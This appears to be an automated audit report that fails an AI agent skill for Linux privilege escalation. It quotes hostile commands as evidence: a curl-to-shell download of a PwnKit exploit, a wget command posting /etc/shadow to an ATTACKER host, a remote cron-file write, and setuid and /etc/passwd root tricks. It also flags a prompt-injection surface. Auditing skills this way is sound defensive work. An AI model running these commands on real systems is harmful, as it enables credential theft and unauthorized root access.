linux-privilege-escalation

Fail

Audited by Gen Agent Trust Hub on Apr 9, 2026

Risk Level: CRITICAL
Findings: REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, CREDENTIALS_UNSAFE, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill facilitates the execution of remote code by downloading scripts from unverified sources and piping them directly to a shell.
  • Evidence: The command curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh is recommended for comprehensive enumeration in SKILL.md.
  • Evidence: Direct execution of the PwnKit exploit via curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit && chmod +x PwnKit && ./PwnKit in KERNEL_EXPLOITS_CHECKLIST.md.
  • [DATA_EXFILTRATION]: The skill includes explicit techniques for sending sensitive system information to external attacker-controlled endpoints.
  • Evidence: wget --post-file=/etc/shadow http://ATTACKER/ is listed as a method to exfiltrate the shadow file in SUID_CAPABILITIES_TRICKS.md.
  • Evidence: curl -o /etc/cron.d/rev http://ATTACKER/cron provides a way to write malicious files from a remote server in SUID_CAPABILITIES_TRICKS.md.
  • [CREDENTIALS_UNSAFE]: The playbook provides instructions for harvesting a wide range of sensitive credentials and private keys from the target system.
  • Evidence: Instructions for reading /etc/shadow, ~/.bash_history, and SSH private keys such as id_rsa in SKILL.md.
  • Evidence: Use of grep and find to locate password strings in configuration files across the filesystem in SKILL.md.
  • [COMMAND_EXECUTION]: The skill uses dangerous shell commands to escalate privileges and manipulate system security settings.
  • Evidence: Commands such as chmod +s /tmp/bash and adding a root-level user to /etc/passwd are featured as primary escalation paths in SKILL.md.
  • Evidence: Exploiting specific Linux capabilities such as cap_setuid and cap_dac_override through interpreters like Python and Perl to obtain a root shell in SUID_CAPABILITIES_TRICKS.md.
  • [EXTERNAL_DOWNLOADS]: The skill relies on downloading numerous third-party security tools and exploit payloads from unverified repositories.
  • Evidence: Downloads of linux-exploit-suggester, pspy64, and LinEnum.sh from various GitHub accounts are encouraged in SKILL.md and KERNEL_EXPLOITS_CHECKLIST.md.
  • [PROMPT_INJECTION]: The skill has a significant indirect prompt injection surface, because it ingests untrusted target system output to drive its logic without boundary markers or sanitization.
  • Ingestion points: Reads output from commands such as uname, id, find, and getcap in SKILL.md.
  • Boundary markers: Absent.
  • Capability inventory: Includes os.system, subprocess, curl, wget, chmod, gcc, and mount across all scripts.
  • Sanitization: Absent.
Recommendations
  • HIGH: Downloads and executes remote code from: https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
  • AI detected serious security threats
  • Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata
Risk Level: CRITICAL
Analyzed: Apr 9, 2026, 01:14 PM